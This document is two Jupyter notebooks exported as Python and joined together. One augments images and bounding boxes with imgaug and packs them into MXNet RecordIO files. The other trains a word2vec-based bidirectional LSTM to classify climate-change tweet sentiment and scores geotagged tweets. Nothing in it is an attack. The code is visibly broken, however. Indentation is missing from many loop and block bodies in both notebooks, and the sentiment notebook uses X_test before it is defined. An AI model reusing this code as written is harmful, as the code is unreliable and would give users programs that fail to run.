def read_lst(dat):
    """
    Parse one lst-format record (a string)
    """
    dat_list = dat.split('\t')
    index = int(dat_list[0])
    header_size = int(dat_list[1])
    assert header_size == 2, 'header_size is expected to be 2: '+str(header_size)
    label_width = int(dat_list[2])
    assert label_width == 5, 'label_width is expected to be 5: '+str(label_width)
    label_data = dat_list[3:-1]
    assert (len(label_data) % label_width) == 0 , 'len(label_data) must be a multiple of label_width'
    file_path = dat_list[-1]
    return (index, header_size, label_width, label_data, file_path)
# -
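To make the record layout concrete, here is a hypothetical lst line (the filename `cat.jpg` and the coordinate values are made up) pulled apart the same way `read_lst` does:

```python
# A hypothetical lst record: index, header_size=2, label_width=5,
# one label (class_id, x1, y1, x2, y2 in normalized coordinates), image path
line = '\t'.join(['7', '2', '5', '0', '0.1', '0.2', '0.5', '0.6', 'cat.jpg'])
fields = line.split('\t')
labels = fields[3:-1]   # everything between the header and the trailing path
```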
# ### Processing
# +
import os
from os import path
import shutil
from PIL import Image
from tqdm import tqdm
assert len(lst_path_list) == len(img_root_path_list), "lst_path_list and img_root_path_list must have the same length"
# Output destinations for the merged lst file and images
output_lst_path = path.join(merged_root_path, "lst.lst")
output_img_root_path = path.join(merged_root_path, "img")
# Reset the output destination
if path.isdir(merged_root_path):
    shutil.rmtree(merged_root_path)
os.makedirs(merged_root_path)
os.makedirs(output_img_root_path)
# Start the merge
merged_lst = []
for lst_path, img_root_path in tqdm(zip(lst_path_list, img_root_path_list)):
with open(lst_path) as lst_f:
for line in tqdm(lst_f.readlines()):
line = line.strip()
if not line: continue
            # Parse the lst record into variables
index, header_size, label_width, label_data, img_path = read_lst(line)
img_path = path.join(img_root_path, img_path)
merged_index = len(merged_lst) + 1
            # Rewrite the image file name to the running index
after_img_name = str(merged_index) + path.splitext(img_path)[1]
after_img_path = path.join(output_img_root_path, after_img_name)
            # Copy the image to the merged output destination
img = Image.open(img_path)
            # Resize to fit within img_edge_size x img_edge_size (thumbnail keeps the aspect ratio; note it does not pad the image to a square)
img.thumbnail((img_edge_size, img_edge_size))
img.save(after_img_path)
            # Build the lst-format record
lst_dat = create_lst(after_img_name, merged_index, label_data)
merged_lst.append(lst_dat)
# Write the records out, one per line
with open(output_lst_path, 'w') as out_f:
out_f.write('\n'.join(merged_lst))
# -
# # Augment the training data
# Split the data into validation and training sets, then augment each using [imgaug](https://github.com/aleju/imgaug).
# When processing finishes, print the number of validation and training samples.
# +
# Fraction of validation data; if 0, only training data is created
validate_ratio = 0.2
# lst file to read
lst_path = output_lst_path
img_root_path = output_img_root_path
# Output root for the augmented data
augmented_root_path = './data/augmented'
# -
# ### Define the augmentation pipeline
# The operations defined in `augs` are executed.
# Change `augs` and `aug_templates` as needed.
# +
import numpy as np
import math
from PIL import Image
from scipy import misc
import imgaug as ia
from imgaug import augmenters as iaa
from matplotlib import pyplot as plt
# Fix the random seed
ia.seed(1)
# Define augmentors for image augmentation (change as needed)
aug_templates = [
    iaa.Invert(1, per_channel=0.5), # invert each pixel value
    iaa.CoarseDropout((0.03, 0.15), size_percent=(0.02, 0.25)), # drop out coarse rectangular patches
    iaa.CoarseDropout((0.03, 0.15), size_percent=0.02, per_channel=0.8), # change colors in coarse patches
    iaa.CoarseSaltAndPepper(0.2, size_percent=(0.05, 0.1)), # coarse black-and-white noise
    iaa.WithChannels(0, iaa.Affine(rotate=(0,10))), # rotate the red channel only
    iaa.FrequencyNoiseAlpha( # add structured frequency-domain noise
        first=iaa.EdgeDetect(1),
        per_channel=0.5
    ),
    iaa.ElasticTransformation(sigma=0.5, alpha=1.0), # elastic (mosaic-like) distortion
    iaa.AddToHueAndSaturation(value=25), # shift hue and saturation
    iaa.Emboss(alpha=1.0, strength=1.5), # emboss effect
    iaa.Superpixels(n_segments=100, p_replace=0.5), # superpixel representation: overwrite each cell with its mean color at the given probability
    iaa.Fliplr(1.0),
    iaa.Flipud(1.0)
]
# List of augmentations to apply (change as needed)
augs = [
    iaa.Noop(), # no transformation
iaa.SomeOf(1, aug_templates),
iaa.SomeOf(1, aug_templates),
iaa.SomeOf(1, aug_templates),
iaa.SomeOf(2, aug_templates),
iaa.SomeOf(2, aug_templates),
iaa.SomeOf(2, aug_templates),
iaa.SomeOf(3, aug_templates)
]
# -
# ### Processing
# +
import random
import copy
assert validate_ratio < 1.0, "validate_ratio must be less than 1.0: " + str(validate_ratio)
# Output destinations for the augmented lst files and images
train_augmented_lst_path = path.join(augmented_root_path, "train.lst")
train_augmented_img_root_path = path.join(augmented_root_path, "train")
val_augmented_lst_path = path.join(augmented_root_path, "val.lst")
val_augmented_img_root_path = path.join(augmented_root_path, "val")
# Reset the output destination
if path.isdir(augmented_root_path):
shutil.rmtree(augmented_root_path)
os.makedirs(augmented_root_path)
os.makedirs(train_augmented_img_root_path)
os.makedirs(val_augmented_img_root_path)
train_augmented_lst = []
val_augmented_lst = []
with open(lst_path) as lst_f:
for line in tqdm(lst_f.readlines()):
line = line.strip()
if not line: continue
        # Parse the lst record into variables
origin_img_index, header_size, label_width, label_data, img_path = read_lst(line)
img_path = path.join(img_root_path, img_path)
        # Load the image
target_img = np.array(Image.open(img_path))
        # Build the bounding boxes
img_height = target_img.shape[0]
img_width = target_img.shape[1]
bbs = []
for bb_index in range(len(label_data)//label_width):
bbs.append(ia.BoundingBox(
x1 = float(label_data[bb_index * label_width + 1]) * img_width,
y1 = float(label_data[bb_index * label_width + 2]) * img_height,
x2 = float(label_data[bb_index * label_width + 3]) * img_width,
y2 = float(label_data[bb_index * label_width + 4]) * img_height
))
bbs_on_img = ia.BoundingBoxesOnImage(bbs, shape = target_img.shape)
        # Assign to the validation set with the given probability
if random.random() < validate_ratio:
augmented_lst = val_augmented_lst
augmented_img_root_path = val_augmented_img_root_path
else:
augmented_lst = train_augmented_lst
augmented_img_root_path = train_augmented_img_root_path
        # Image augmentation
aug_num = len(augs)
for aug_index, aug in enumerate(augs):
            # Make the augmentor deterministic (so the image and its bounding boxes receive the exact same transformation)
aug = aug.to_deterministic()
            # Augment the image and its bounding boxes
aug_img = aug.augment_image(target_img)
aug_bbs = aug.augment_bounding_boxes([bbs_on_img])[0]
image_index = len(augmented_lst) + 1
            # Filename for the augmented image
after_img_name = "{0:05d}_{1:03d}{2}".format(origin_img_index, aug_index+1, path.splitext(img_path)[1])
after_img_path = path.join(augmented_img_root_path, after_img_name)
# 増幅した画像を保存
Image.fromarray(aug_img).save(after_img_path)
# ラベルデータを上書き
aug_label_data = copy.deepcopy(label_data)
for bb_index in range(len(label_data)//label_width):
aug_label_data[bb_index * label_width + 1] = str(aug_bbs.bounding_boxes[bb_index].x1 / img_width)
aug_label_data[bb_index * label_width + 2] = str(aug_bbs.bounding_boxes[bb_index].y1 / img_height)
aug_label_data[bb_index * label_width + 3] = str(aug_bbs.bounding_boxes[bb_index].x2 / img_width)
aug_label_data[bb_index * label_width + 4] = str(aug_bbs.bounding_boxes[bb_index].y2 / img_height)
# 増幅画像用のlst形式のテキストを作成
lst_dat = create_lst(after_img_name, image_index, aug_label_data)
augmented_lst.append(lst_dat)
# 作成したデータを要素ごとに改行して書き出す
with open(train_augmented_lst_path, 'w') as out_f:
out_f.write('\n'.join(train_augmented_lst))
if len(val_augmented_lst) > 0:
with open(val_augmented_lst_path, 'w') as out_f:
out_f.write('\n'.join(val_augmented_lst))
print("train data: ",len(train_augmented_lst))
print("validation data: ", len(val_augmented_lst))
# -
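# As a minimal sketch, the loop above assumes an im2rec-style .lst layout for `read_lst`/`create_lst`:
# tab-separated index, header size, label width, the flattened (class, x1, y1, x2, y2) boxes, and the
# image path. `parse_lst_line` below is a hypothetical stand-in for that parsing, not the notebook's helper:

```python
def parse_lst_line(line):
    # index \t header_size \t label_width \t labels... \t image_path
    fields = line.strip().split('\t')
    index = int(float(fields[0]))
    header_size = int(float(fields[1]))
    label_width = int(float(fields[2]))
    label_data = fields[3:-1]  # flattened (class, x1, y1, x2, y2) per box
    img_path = fields[-1]
    return index, header_size, label_width, label_data, img_path

idx, hs, lw, labels, p = parse_lst_line("7\t2\t5\t0\t0.1\t0.2\t0.5\t0.6\timg/00007.jpg")
```

# With label_width = 5, `len(label_data) // label_width` then gives the number of boxes on the image.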
# # Convert to RecordIO format
# +
import os
import urllib.request
def download(url):
    filename = url.split("/")[-1]
    if not os.path.exists(filename):
        urllib.request.urlretrieve(url, filename)
# Fetch im2rec.py, the MXNet tool that packs a .lst file and its images into RecordIO
download('https://raw.githubusercontent.com/apache/incubator-mxnet/master/tools/im2rec.py')
# -
# !python im2rec.py ./data/augmented/train.lst ./data/augmented/train/ --num-thread 4 --pack-label
# !python im2rec.py ./data/augmented/val.lst ./data/augmented/val/ --num-thread 4 --pack-label
image/augment_image_base.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
import pickle
import json
import gensim
import os
import re
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from pandas.plotting import scatter_matrix
from keras.models import load_model
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing import sequence
from keras.optimizers import RMSprop, SGD
from keras.models import Sequential, Model
from keras.layers.core import Dense, Dropout, Activation, Flatten, Reshape
from keras.layers import Input, Bidirectional, LSTM, regularizers
from keras.layers.embeddings import Embedding
from keras.layers.convolutional import Conv1D, MaxPooling1D, MaxPooling2D, Conv2D
from keras.layers.normalization import BatchNormalization
from keras.callbacks import EarlyStopping
# %matplotlib inline
import matplotlib
import matplotlib.pyplot as plt
# -
filename = '../wyns/data/tweet_global_warming.csv'
df = pd.read_csv(filename, encoding='latin')
df.head()
model_path = "GoogleNews-vectors-negative300.bin"
word_vector_model = gensim.models.KeyedVectors.load_word2vec_format(model_path, binary=True)
def normalize(txt, vocab=None, replace_char=' ',
              max_length=300, pad_out=False,
              to_lower=True, reverse=False,
              truncate_left=False, encoding=None,
              letters_only=False):
    txt = txt.split()
    # Remove URLs (other characters and symbols are kept)
    txt = [re.sub(r'http:.*', '', r) for r in txt]
    txt = [re.sub(r'https:.*', '', r) for r in txt]
    txt = " ".join(txt)
    # Remove non-emoticon punctuation and digits
    txt = re.sub("[.,!0-9]", " ", txt)
    if letters_only:
        txt = re.sub("[^a-zA-Z]", " ", txt)
    txt = " ".join(txt.split())
    # Store the length for later comparisons
    txt_len = len(txt)
    if truncate_left:
        txt = txt[-max_length:]
    else:
        txt = txt[:max_length]
    # Change case
    if to_lower:
        txt = txt.lower()
    # Reverse the character order
    if reverse:
        txt = txt[::-1]
    # Replace characters outside the allowed vocabulary
    if vocab is not None:
        txt = ''.join([c if c in vocab else replace_char for c in txt])
    # Re-encode the text
    if encoding is not None:
        txt = txt.encode(encoding, errors="ignore")
    # Pad out if needed
    if pad_out and max_length > txt_len:
        txt = txt + replace_char * (max_length - txt_len)
    # Strip @mentions one at a time
    if txt.find('@') > -1:
        for i in range(len(txt.split('@')) - 1):
            try:
                if str(txt.split('@')[1]).find(' ') > -1:
                    to_remove = '@' + str(txt.split('@')[1].split(' ')[0]) + " "
                else:
                    to_remove = '@' + str(txt.split('@')[1])
                txt = txt.replace(to_remove, '')
            except Exception:
                pass
    return txt
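# The URL and @mention stripping above is easier to see on a toy input. This standalone
# sketch (strip_urls_and_mentions is illustrative, not the notebook's normalize) performs
# the same two cleanups with plain regexes:

```python
import re

def strip_urls_and_mentions(txt):
    txt = re.sub(r'https?:\S*', '', txt)  # drop http/https URLs
    txt = re.sub(r'@\w+', '', txt)        # drop @mentions
    return ' '.join(txt.split())          # collapse leftover whitespace

strip_urls_and_mentions("so true @user1 see http://t.co/x climate is real")
```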
def balance(df):
    print("Balancing the classes")
    type_counts = df['Sentiment'].value_counts()
    min_count = min(type_counts.values)
    balanced_df = None
    for key in type_counts.keys():
        df_sub = df[df['Sentiment'] == key].sample(n=min_count, replace=False)
        if balanced_df is not None:
            balanced_df = balanced_df.append(df_sub)
        else:
            balanced_df = df_sub
    return balanced_df
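# The downsampling that balance() performs can be sketched with a pandas groupby on a toy
# frame (the column name Sentiment matches the notebook; the data below is made up):

```python
import pandas as pd

demo = pd.DataFrame({'Sentiment': ['Y'] * 6 + ['N'] * 2})
min_count = demo['Sentiment'].value_counts().min()
# Sample every class down to the size of the rarest class
balanced = pd.concat(
    grp.sample(n=min_count, random_state=0)
    for _, grp in demo.groupby('Sentiment')
)
```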
# +
def tweet_to_sentiment(tweet):
    norm_text = normalize(tweet[0])
    if tweet[1] in ('Yes', 'Y'):
        return ['positive', norm_text]
    elif tweet[1] in ('No', 'N'):
        return ['negative', norm_text]
    else:
        return ['other', norm_text]
df = pd.read_csv(filename, encoding='latin')
data = []
for index, row in df.iterrows():
    data.append(tweet_to_sentiment(row))
twitter = pd.DataFrame(data, columns=['Sentiment', 'clean_text'], dtype=str)
# -
# For this demo we could keep only the positive and negative tweets; everything else is marked 'other'
# twitter = twitter[twitter['Sentiment'].isin(['positive', 'negative'])]
twitter.head()
print(len(twitter))
# twitter['Sentiment'].unique()
pd.options.display.max_colwidth = 300
print(twitter.loc[0])
# +
#Run this cell to balance training data
# twitter = balance(twitter)
# len(twitter)
# -
# Now go from the pandas into lists of text and labels
text = twitter['clean_text'].values
labels_0 = pd.get_dummies(twitter['Sentiment']) # mapping of the labels with dummies (has headers)
# print(labels_0[:10], twitter['Sentiment'].iloc[:10])
# labels = labels_0.values
labels = labels_0.values[:, [0, 2]]  # keep only the negative and positive columns, dropping 'other'
print(labels)
# Perform the Train/test split
X_train_, X_test_, Y_train_, Y_test_ = train_test_split(text,labels, test_size = 0.2, random_state = 42)
print(labels_0)
Y_test = []
xt = []
# Keep only the labeled rows (an unlabeled row is the all-zero vector [0, 0])
for i in range(Y_test_.shape[0]):
    if Y_test_[i].mean() > 0:
        Y_test.append(Y_test_[i])
        xt.append(X_test[i])  # note: X_test is built in the tokenization cell below, so run that cell first
Y_test = np.array(Y_test)
xt = np.array(xt)
print(Y_test_.shape, Y_test.shape)
# print(Y_train_[:,0].mean(), Y_train_[:,1].mean())
from sklearn.utils import class_weight
# compute_class_weight expects 1-D class labels, so collapse the one-hot rows with argmax
y_flat = np.argmax(Y_train_, axis=1)
class_weights = class_weight.compute_class_weight('balanced',
                                                  np.unique(y_flat),
                                                  y_flat)
print(class_weights)
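# sklearn's 'balanced' mode weights each class by n_samples / (n_classes * class_count),
# so rarer classes get larger weights. A hand computation on toy labels shows the effect:

```python
import numpy as np

y = np.array([0, 0, 0, 1])  # toy 1-D labels: class 0 is three times as common
classes, counts = np.unique(y, return_counts=True)
weights = len(y) / (len(classes) * counts)  # the 'balanced' formula
```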
# +
### Now for a simple bidirectional LSTM algorithm we set our feature sizes and train a tokenizer
# First we tokenize and convert the text into padded integer index sequences the model can read
# In this cell we are also going to define some of our hyperparameters
max_fatures = 2000
max_len = 2000
words_len = 30
batch_size = 32
embed_dim = 300
lstm_out = 140
dense_out = len(labels[0])  # number of output classes
tokenizer = Tokenizer(num_words=max_fatures, split=' ')
tokenizer.fit_on_texts(X_train_)
X_train = tokenizer.texts_to_sequences(X_train_)
X_train = pad_sequences(X_train, maxlen=words_len, padding='post')
print(X_train[:,-1].mean())
X_test = tokenizer.texts_to_sequences(X_test_)
X_test = pad_sequences(X_test, maxlen=words_len, padding='post')
word_index = tokenizer.word_index
# print(len(word_index))
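# pad_sequences(maxlen=words_len, padding='post') right-pads short sequences with zeros and,
# with the Keras default truncating='pre', keeps the tail of over-long ones. A pure-Python
# sketch of that behavior (pad_post is illustrative, not the Keras function):

```python
def pad_post(seq, maxlen, value=0):
    seq = list(seq)[-maxlen:]  # default truncating='pre' keeps the last maxlen tokens
    return seq + [value] * (maxlen - len(seq))

pad_post([3, 1, 4, 1, 5], 3), pad_post([2], 4)
```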
# +
# prepare embedding matrix
num_words = min(max_fatures, len(word_index))
embedding_matrix = np.zeros((num_words, embed_dim))
for word, i in word_index.items():
    if i >= num_words:  # the matrix only has num_words rows
        continue
    # words not found in the embedding model stay all-zeros
    if word in word_vector_model.vocab:
        embedding_matrix[i] = word_vector_model.word_vec(word)
# load pre-trained word embeddings into an Embedding layer
# note that we set trainable = False to keep the embeddings frozen
embedding_layer = Embedding(num_words,
                            embed_dim,
                            weights=[embedding_matrix],
                            input_length=words_len,  # sequences are padded to words_len, not max_fatures
                            trainable=False)
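# At inference time an Embedding layer is just a row lookup into its weight matrix:
# each token index selects one row. A numpy sketch with a toy matrix:

```python
import numpy as np

vocab_size, dim = 5, 3
emb = np.arange(vocab_size * dim, dtype=float).reshape(vocab_size, dim)  # toy weights
seq = np.array([1, 4, 0])  # a padded token-index sequence
vectors = emb[seq]         # shape (len(seq), dim), one embedding row per token
```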
# +
# Define the model using the pre-trained embedding
# import keras
sequence_input = Input(shape=(words_len,), dtype='int32')
# gbm_input = Input(shape=(Y_train_.shape[1],), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
# embedded_sequences = keras.layers.concatenate([gbm_input,embedding_layer(sequence_input)],axis=1)
x = Bidirectional(LSTM(lstm_out, recurrent_dropout=0.5, activation='tanh'))(embedded_sequences)
# x = Bidirectional(LSTM(lstm_out, recurrent_dropout=0.5, activation='tanh'))(x)
x = Dense(250, activation='elu')(x)
preds = Dense(dense_out, activation='softmax')(x)
model = Model([sequence_input], preds)
model.compile(loss='categorical_crossentropy',
              optimizer='adam',
              metrics=['acc'])
print(model.summary())
# -
# Keras expects class_weight as a {class_index: weight} dict, not a list
model_hist_embedding = model.fit(X_train, Y_train_, epochs=20, batch_size=batch_size, verbose=2,
                                 class_weight={0: 1/Y_train_[:, 0].mean(), 1: 1/Y_train_[:, 1].mean()},
                                 validation_data=(xt, Y_test))
# +
def acc(y, y_):
    score = 0
    for i in range(y.shape[0]):
        if np.argmax(y[i]) == np.argmax(y_[i]):
            score += 1
    score = score / y.shape[0]
    return score
pp = model.predict(xt)
print(acc(Y_test,pp))
# -
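# acc() above compares argmaxes row by row; numpy can do the same comparison vectorized
# (acc_vec is an illustrative equivalent, not used elsewhere in the notebook):

```python
import numpy as np

def acc_vec(y, y_):
    # fraction of rows where the predicted and true argmax agree
    return float((np.argmax(y, axis=1) == np.argmax(y_, axis=1)).mean())

y_true = np.array([[1, 0], [0, 1], [1, 0]])
y_pred = np.array([[0.9, 0.1], [0.2, 0.8], [0.4, 0.6]])
acc_vec(y_true, y_pred)
```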
# train a gradient boosted machine
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.multioutput import MultiOutputClassifier
gbm = GradientBoostingClassifier(n_estimators = 5000)
mo = MultiOutputClassifier(gbm, n_jobs = -1)
mo.fit(X_train,Y_train_)
# +
# print(mo.score(xt,Y_test))
# print(mo.score(X_train,Y_train_))
# predd = mo.predict(X_train)
# pred_test = mo.predict(Y_test)
# +
# print(embedding_matrix)
# -
model_hist_embedding = model.fit(X_train, Y_train_, epochs=20, batch_size=batch_size, verbose=2,
                                 validation_data=(X_test, Y_test_))
confusion_matrix(Y_test[:,1], np.round(model.predict(xt))[:,1])
# Training Accuracy
x = np.arange(20)+1
fig=plt.figure(dpi=300)
ax = fig.add_subplot(111)
ax.plot(x, model_hist_embedding.history['acc'])
ax.plot(x, model_hist_embedding.history['val_acc'])
ax.legend(['Training', 'Testing'], loc='lower right')
plt.ylabel("Accuracy")
axes = plt.gca()
axes.set_ylim([0.45,1.01])
plt.xlabel("Epoch")
plt.title("LSTM Accuracy")
plt.show()
fig.savefig(fname='03.png', bbox_inches='tight', format='png')
# model_hist_embedding.model.save("../wyns/data/climate_sentiment_m6.h5")
# m6: NaNs were included in the training set but removed from the test set; a NaN is encoded as [0,0] for [for, against]
model = load_model("../wyns/data/climate_sentiment_m6.h5")
# +
# model = model_hist_embedding.model
# +
def tweet_to_sentiment(tweet):
    # The label comes in as Y/N/NaN; clean the text and map the label
    # to a positive, negative, or other class
    norm_text = normalize(tweet[0])
    if tweet[1] in ('Yes', 'Y'):
        return ['positive', norm_text]
    elif tweet[1] in ('No', 'N'):
        return ['negative', norm_text]
    else:
        return ['other', norm_text]
def clean_tweet(tweet):
    norm_text = normalize(tweet[0])
    return [tweet[1], tweet[2], norm_text, tweet[3], tweet[4], tweet[5], tweet[0]]
# -
df = pd.read_csv("../wyns/data/tweets.txt", delimiter="~~n~~", engine="python")
df.head()
data = []
for index, row in df.iterrows():
    data.append(clean_tweet(row))
twitter = pd.DataFrame(data, columns=['long', 'lat', 'clean_text', 'time', 'retweets', 'location','raw_text'], dtype=str)
to_predict_ = twitter['clean_text'].values
# +
### Reuse the same feature sizes and train a tokenizer for the prediction data
# First we tokenize and convert the text into padded integer index sequences the model can read
# In this cell we also redefine the relevant hyperparameters
max_fatures = 2000
max_len=30
batch_size = 32
embed_dim = 300
lstm_out = 140
dense_out=len(labels[0]) #length of features
tokenizer = Tokenizer(num_words=max_fatures, split=' ')
tokenizer.fit_on_texts(to_predict_)
to_predict = tokenizer.texts_to_sequences(to_predict_)
to_predict = pad_sequences(to_predict, maxlen=max_len, padding='post')
word_index = tokenizer.word_index
# -
predictions = model.predict(to_predict)
print("negative predictions: {}".format(sum(np.round(predictions)[:,0])))
print("positive predictions: {}".format(sum(np.round(predictions)[:,1])))
df_out = pd.DataFrame([twitter['long'], twitter['lat'], twitter['clean_text'],
                       twitter['time'], twitter['retweets'], twitter['location'],
                       predictions[:, 0], predictions[:, 1]]).T
df_out = df_out.rename(index=str, columns={"Unnamed 0": "negative", "Unnamed 1": "positive"})
print(df_out.shape)
df_out.head()
df_out.to_csv("sample_prediction.csv", index=False)
import re
new_lines = []
for i in df_out['clean_text']:
    raw = i.split(" ")
    out = ""
    count = 0
    for j in raw:
        if count < 6:
            out += j + " "
            count += 1
        else:
            out += j + "\n"
            count = 0
    new_lines.append(out)
df_out['new_lines'] = pd.Series(new_lines)
# print(new_lines)
# print(re.sub('( [^ ][^ ][^ ]*),', r'\1 ', i))
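# The counter-based loop above inserts a newline roughly every seventh word; a cleaner
# equivalent can be sketched with slicing (wrap_words is illustrative, not used above):

```python
def wrap_words(text, n=7):
    # join every group of n words with spaces, and the groups with newlines
    words = text.split()
    return '\n'.join(' '.join(words[i:i + n]) for i in range(0, len(words), n))

wrap_words("a b c d e f g h i", 7)
```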
df_out.head()
len(df_out)
examples/w2v_lstm_model-Copy1.ipynb